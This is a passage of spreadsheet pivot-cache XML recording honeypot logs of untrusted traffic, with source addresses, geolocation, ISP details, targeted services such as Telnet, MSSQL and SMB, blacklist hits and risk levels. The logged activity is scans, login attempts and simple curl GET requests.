    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UK"/>
    <s v="Uttarakhand"/>
    <s v="Dehradun"/>
    <s v="Dehradun"/>
    <s v="1273313"/>
    <s v="NA"/>
    <s v="30.3244"/>
    <s v="78.0339"/>
    <s v="58906"/>
    <s v="Shivansh Infotech pvt Ltd"/>
    <s v="Shivansh Infotech pvt Ltd"/>
    <s v="business"/>
    <s v="Precious netcom pvt ltd"/>
    <s v="2014-12-23"/>
    <s v="PNPL"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:672f:e28"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3791"/>
    <x v="3791"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:23:04"/>
    <d v="2025-04-01T11:23:04"/>
    <d v="2025-04-01T11:23:04"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>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1:f4d3"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3792"/>
    <x v="3792"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:22:39"/>
    <d v="2025-04-01T11:22:39"/>
    <d v="2025-04-01T11:22:39"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="143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MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f8:aaa1"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3793"/>
    <x v="3793"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:21:14"/>
    <d v="2024-12-24T04:17:55"/>
    <d v="2025-04-01T11:21:14"/>
    <n v="32"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_SMB_H46"/>
    <s v="1433&amp;&amp;445"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Vinayaka Nagar)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9497"/>
    <s v="77.5954"/>
    <s v="139195"/>
    <s v="Seans Media Pvt Ltd"/>
    <s v="Telex Air Telecom"/>
    <s v="business"/>
    <s v="TelexAir Telecom Pvt Ltd"/>
    <s v="2014-10-31"/>
    <s v="INFYNIXD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,63994)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,55506)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,55833)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,61647)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,61667)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (103.42.75.85,62127)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:672a:4b55"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3794"/>
    <x v="3794"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:13:26"/>
    <d v="2025-04-01T11:13:26"/>
    <d v="2025-04-01T11:13:26"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="North"/>
    <s v="Sāhibābād Daulotpur"/>
    <s v="10263162"/>
    <s v="NA"/>
    <s v="28.747"/>
    <s v="77.1146"/>
    <s v="17488"/>
    <s v="HATHWAY-NET-AP"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="consumer"/>
    <s v="Hathway Cable and Datacom Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d63:1f0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3795"/>
    <x v="3795"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:09:57"/>
    <d v="2025-03-01T17:18:20"/>
    <d v="2025-04-01T11:09:57"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H43"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['exploits'&amp;&amp; 'unknown']}"/>
    <n v="79"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="GJ"/>
    <s v="Gujarat"/>
    <s v="Rajkot"/>
    <s v="Rajkot (Jagnath Plot)"/>
    <s v="1258847"/>
    <s v="360004"/>
    <s v="22.2934"/>
    <s v="70.7906"/>
    <s v="45117"/>
    <s v="Ishan's Network"/>
    <s v="INPL's"/>
    <s v="business"/>
    <s v="NA"/>
    <s v="2010-03-25"/>
    <s v="ISHAN-NETSOL"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:1b36:b298"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3796"/>
    <x v="3796"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T11:08:58"/>
    <d v="2025-04-01T10:44:09"/>
    <d v="2025-04-01T11:08:58"/>
    <n v="20"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75f1:5439"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3797"/>
    <x v="3797"/>
    <s v="NA&amp;&amp;162-216-111-48.mm.cstr.royell.org"/>
    <x v="0"/>
    <d v="2025-04-01T11:06:19"/>
    <d v="2025-03-21T23:14:24"/>
    <d v="2025-04-01T11:06:19"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="IL"/>
    <s v="Illinois"/>
    <s v="Macoupin"/>
    <s v="Virden"/>
    <s v="4252060"/>
    <s v="62690"/>
    <s v="39.5018"/>
    <s v="-89.7737"/>
    <s v="10958"/>
    <s v="Royell Communications, Inc."/>
    <s v="Royell Communications, Inc."/>
    <s v="business"/>
    <s v="Royell Communications, Inc."/>
    <s v="2013-06-28"/>
    <s v="ROYELLNET"/>
    <s v="2013-06-28"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="2001-03-26 19:46:06"/>
    <s v="2027-03-26 19:46:07"/>
    <s v="2025-03-27 16:16:06"/>
    <s v="['dns1.royell.org', 'dns2.royell.org']"/>
    <s v="GoDaddy.com, LLC"/>
    <s v="['clientDeleteProhibited https://icann.org/epp#clientDeleteProhibited', 'clientRenewProhibited https://icann.org/epp#clientRenewProhibited', 'clientTransferProhibited https://icann.org/epp#clientTransferProhibited', 'clientUpdateProhibited https://icann.org/epp#clientUpdateProhibited', 'autoRenewPeriod https://icann.org/epp#autoRenewPeriod', 'renewPeriod https://icann.org/epp#renewPeriod']"/>
    <s v="REDACTED FOR PRIVACY"/>
    <x v="20"/>
    <s v="NA"/>
    <s v="REDACTED FOR PRIVACY"/>
    <s v="::ffff:a2d8:6f30"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3798"/>
    <x v="3798"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:57:58"/>
    <d v="2024-06-30T21:15:31"/>
    <d v="2025-04-01T10:57:58"/>
    <n v="28"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_LDAP_H5&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_MT-CPA_H32&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_MT-CPA_H6&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="389&amp;&amp;445&amp;&amp;63947&amp;&amp;1433&amp;&amp;16455&amp;&amp;53397&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="DL"/>
    <s v="Delhi"/>
    <s v="New Delhi"/>
    <s v="New Delhi (Okhla Phase III)"/>
    <s v="1261481"/>
    <s v="110049"/>
    <s v="28.5508"/>
    <s v="77.268"/>
    <s v="9498"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel Limited"/>
    <s v="business"/>
    <s v="Bharti Airtel Limited"/>
    <s v="2005-08-03"/>
    <s v="BHARTI-IN"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="None&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7d14:7db6"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3799"/>
    <x v="3799"/>
    <s v="NA&amp;&amp;218-161-80-219.hinet-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-01T10:57:27"/>
    <d v="2024-12-16T14:10:09"/>
    <d v="2025-04-01T10:57:27"/>
    <n v="412"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_TELNET_H35"/>
    <s v="23&amp;&amp;43008&amp;&amp;80&amp;&amp;32989&amp;&amp;9100"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="2001-10-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:daa1:50db"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3800"/>
    <x v="3800"/>
    <s v="59-127-84-223.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:47:25"/>
    <d v="2024-09-10T17:51:00"/>
    <d v="2025-04-01T10:47:25"/>
    <n v="345"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic&amp;&amp;Suspicious Web Activity Detected"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_SSH_H47&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H6"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;23&amp;&amp;45048&amp;&amp;33050&amp;&amp;9100"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'b.barracudacentral.org': ['unknown']}"/>
    <n v="68"/>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login&amp;&amp;connection&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>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3b7f:54df"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3801"/>
    <x v="3801"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:43:13"/>
    <d v="2025-04-01T10:43:13"/>
    <d v="2025-04-01T10:43:13"/>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d8:1f75"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3802"/>
    <x v="3802"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:42:04"/>
    <d v="2025-04-01T06:59:35"/>
    <d v="2025-04-01T10:42:04"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="9829"/>
    <s v="Bharat Sanchar Nigam Ltd"/>
    <s v="BSNL Internet"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2000-01-13"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3d01:88c6"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3803"/>
    <x v="3803"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:30:17"/>
    <d v="2025-02-13T16:52:50"/>
    <d v="2025-04-01T10:30:17"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="3306&amp;&amp;1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Nuh"/>
    <s v="Chandīgarh"/>
    <s v="9915976"/>
    <s v="160017"/>
    <s v="30.7333"/>
    <s v="76.7794"/>
    <s v="17917"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="Quadrant Televentures Limited"/>
    <s v="business"/>
    <s v="Saboo Coating LTD"/>
    <s v="2000-09-07"/>
    <s v="SABOO-COATING-LTD"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:caa4:2705"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3804"/>
    <x v="3804"/>
    <s v="220-133-208-116.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:30:06"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-01T10:30:06"/>
    <n v="455"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H30&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;36063&amp;&amp;23&amp;&amp;NA&amp;&amp;80&amp;&amp;9100&amp;&amp;34879"/>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2003-06-09"/>
    <s v="HINET-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA&amp;&amp;GET"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL: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dc85:d074"/>
    <s v="C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="3805"/>
    <x v="3805"/>
    <s v="114-33-34-150.hinet-ip.hinet.net&amp;&amp;NA"/>
    <x v="0"/>
    <d v="2025-04-01T10:23:09"/>
    <d v="2024-03-21T20:38:42"/>
    <d v="2025-04-01T10:23:09"/>
    <n v="351"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
